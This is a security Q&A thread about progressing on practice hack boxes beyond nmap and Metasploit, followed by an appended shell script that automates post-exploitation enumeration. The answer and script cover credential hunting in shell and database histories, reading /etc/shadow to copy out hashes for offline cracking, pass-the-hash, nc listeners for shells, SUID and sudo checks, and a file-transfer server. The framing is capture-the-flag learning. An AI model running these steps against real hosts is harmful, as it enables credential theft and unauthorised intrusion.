When I'm working on hack boxes, what I do (if not using Armitage) is:

  1. nmap the box to discover the running services and their versions
  2. search Metasploit to find a working exploit for those versions

Now I'm stuck. What if the running service version is not vulnerable, or the service version is said to have a vulnerability but there is no public exploit?

I was wondering what real hackers do beyond basic nmap + metasploit. When I don't have working exploits, I can't move forward.

I know you may say phishing or exploit writing.

schroeder
tomy
  • This is really far too broad to answer. You need to use a ***methodology*** to figure out what to do next. There are many published approaches. You need to enumerate, then get very curious about how everything is installed and configured to look for the tiny cracks you can leverage. – schroeder Dec 18 '19 at 07:46
  • @schroeder Maybe OP needs examples of methodologies. Because, from what I see, he's describing a basic pentesting approach. I'm no pentester expert so I won't give advice, but I think if you want you could give a guideline, maybe more advanced than the answer below. – Jason Krs Dec 18 '19 at 13:05
  • 1
    @JasonKrs a search for "pentesting methodologies" will return a wealth of options. Even on this site: https://security.stackexchange.com/questions/118796/penetration-testing-methodologies and https://security.stackexchange.com/questions/142457/standard-operating-procedure-for-pen-test – schroeder Dec 18 '19 at 13:55
  • @schroeder Thanks. Sometimes we don't go for the obvious lol. I did not even search for that here and went straight to Google with its gazillion results – Jason Krs Dec 18 '19 at 14:33

1 Answer

What to do after nmap and metasploit depends on where you are. I'm also around the "script kiddie" level but I'll list some tips I've seen from experience and others:

Before you connect to the box:

  • Do some automated scans with nmap, nikto, wpscan, sqlmap, etc.
  • Check the software versions. They often use out-of-date and insecure software with known vulnerabilities.
  • Google. You should try to understand what that software does and how it may be exploited.

If you're on a web app (in a browser):

  • Look at robots.txt and sitemap.xml. Useful links and folders are sometimes in there.
  • Crawl it (with zaproxy or Burp Suite or some other crawler) and brute force some directories and files (with dirb, dirbuster, gobuster, etc.) to look for interesting folders and files.
  • Poke around. Just go around the app and learn about it. You may find some prompts, boxes for user input, search boxes, file uploads, etc. that you can exploit.
  • Use Developer Tools. You can probably access it by pressing F12. Use Inspector and Inspect Element. The authors sometimes leave some helpful hints in the comments.
  • In Developer Tools, look around at some .js files. There may be some interesting functions.

If you're connected to the box with something like nc:

  • Go around and explore. Just cd into folders. If you know the Linux or Windows file system (depending on the box you're trying to hack), you can quickly spot some "out of place" folders and files.
  • whoami to know your privileges. history to look at, well, history. Users sometimes enter credentials in commands and they get stored in history.
  • Dump hashes. /etc/shadow is an example. You can try and crack those hashes or "pass the hash".
  • python -m SimpleHTTPServer 8080. (Use whichever port you like). This can allow you to upload files from your local machine to the box.
  • nc -lvnp 8080. (Again, use a port you like). This will open a nc listener. I'll leave you to explore how you can pop shells with this.

Those are just a few things you can do. One of the most important things is to "poke and explore". Look around for user input, unusual files and folders, implemented functions, etc. Also, document as much as you can. It'll be much easier to know "where that reverse shell script" was put in the box. It'll also help a lot when you do a write-up.

ChocolateOverflow
  • I like your answer. I'm a script kiddie also: it will help me. I still need to practice the fuzzing part you mentioned. I see lots of people talking about it. In my mind it's so random (for instance, if you don't have the proper wordlist, fuzzing will be efficient) – Jason Krs Dec 18 '19 at 13:06
  • I'm not a big fan of brute forcing tbh. I only really like when I at least have some data on the target, like to make a custom word list, just because that feels more efficient and methodological. It's just a personal preference though. It's also nice if you can write your own scripts and automate your exploits. – ChocolateOverflow Dec 18 '19 at 13:56
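
The Linux post-shell steps from the answer above (whoami, shell history, /etc/shadow, the Python file-transfer server) collected into one script, as an added example that is not part of the original answer or its comments. The credential regex, the list of history file names and the sample history are assumptions made for the demonstration; the sample history is constructed, not real data. The enumeration functions run on the box; the http_server_cmd function prints the command you run on your own machine to serve files that the box then fetches with wget or curl.

```shell
#!/bin/sh
# Added example, not part of the original answer. Post-shell Linux enumeration
# helpers for the steps the answer lists: who am I, what is in shell history,
# can I read /etc/shadow, and how do I move files onto the box.
# The regex, the history file names and the sample history are assumptions.

# Regex for command lines that commonly carry credentials (assumption; tune it):
# password/passwd keywords, sshpass, mysql-style "-pSecret", curl -u user:pass,
# and token/secret/api_key style environment exports.
CRED_PATTERN='passw(or)?d|sshpass|(^|[[:space:]])-p[^[:space:]-]+|curl.*-u[[:space:]]+[^[:space:]]+:[^[:space:]]+|token|secret|api[_-]?key'

# Print the history lines that match CRED_PATTERN. Exit 0 if any matched.
find_creds_in_history() {
    grep -Ei "$CRED_PATTERN" "$1" 2>/dev/null
}

# Print only the number of matching lines; 0 if the file is missing/unreadable.
count_creds_in_history() {
    n=$(grep -Eic "$CRED_PATTERN" "$1" 2>/dev/null) || true
    echo "${n:-0}"
}

# Every readable shell/database history file under /root and the home dirs
# (.bash_history, .zsh_history, .mysql_history, .psql_history, ...).
history_files() {
    find /root /home -maxdepth 2 -type f -name '.*_history' 2>/dev/null |
    while IFS= read -r f; do [ -r "$f" ] && printf '%s\n' "$f"; done
}

# Walk every history file found and report the candidate credential lines.
scan_all_history() {
    history_files | while IFS= read -r f; do
        n=$(count_creds_in_history "$f")
        [ "$n" -gt 0 ] && printf '== %s (%s candidate lines)\n' "$f" "$n" \
                       && find_creds_in_history "$f"
    done
}

# Exit 0 when /etc/shadow is readable by the current user.
shadow_readable() { [ -r /etc/shadow ]; }

# Who are we, can we dump hashes, and what can we sudo without a password?
whoami_report() {
    printf 'user: %s  uid: %s\n' "$(id -un)" "$(id -u)"
    if shadow_readable; then
        printf '/etc/shadow is READABLE: copy the hashes out and crack them offline\n'
    else
        printf '/etc/shadow is not readable as this user\n'
    fi
    sudo -n -l 2>/dev/null || true
}

# SUID binaries are the classic "tiny cracks" worth a close look.
suid_binaries() { find / -xdev -perm -4000 -type f 2>/dev/null; }

# The answer's "python -m SimpleHTTPServer" only exists on Python 2; Python 3
# ships the same thing as http.server. Print the command that works on THIS
# host (run it on your attacking machine, then wget/curl from the box).
http_server_cmd() {
    port=${1:-8080}
    if command -v python3 >/dev/null 2>&1; then
        printf 'python3 -m http.server %s\n' "$port"
    elif python -c 'import sys; sys.exit(sys.version_info[0] != 2)' 2>/dev/null; then
        printf 'python -m SimpleHTTPServer %s\n' "$port"
    else
        return 1
    fi
}

# Constructed sample history for the demonstration run; not real data.
write_sample_history() {
    cat > "$1" <<'EOF'
ls -la
mysql -u root -pSup3rS3cret! shop
cd /var/www
sshpass -p 'hunter2' ssh deploy@10.10.10.5
curl -u admin:admin123 http://10.10.10.5/api/status
git log --oneline
export API_KEY=abcd1234
cp -p config.php config.php.bak
EOF
}

# Demo: scan the constructed history, then run the live checks on this host.
sample=$(mktemp)
write_sample_history "$sample"
printf 'candidate credential lines in sample: %s\n' "$(count_creds_in_history "$sample")"
find_creds_in_history "$sample"
rm -f "$sample"
whoami_report
http_server_cmd 8080 || echo 'no python found; use nc or scp to transfer files'
```

On a real box, scan_all_history covers the database client histories as well as .bash_history, which is where connection strings with embedded passwords usually end up. Note that the shadow check only tells you whether the file is readable: crypt hashes from /etc/shadow are cracked offline with john or hashcat rather than reused directly.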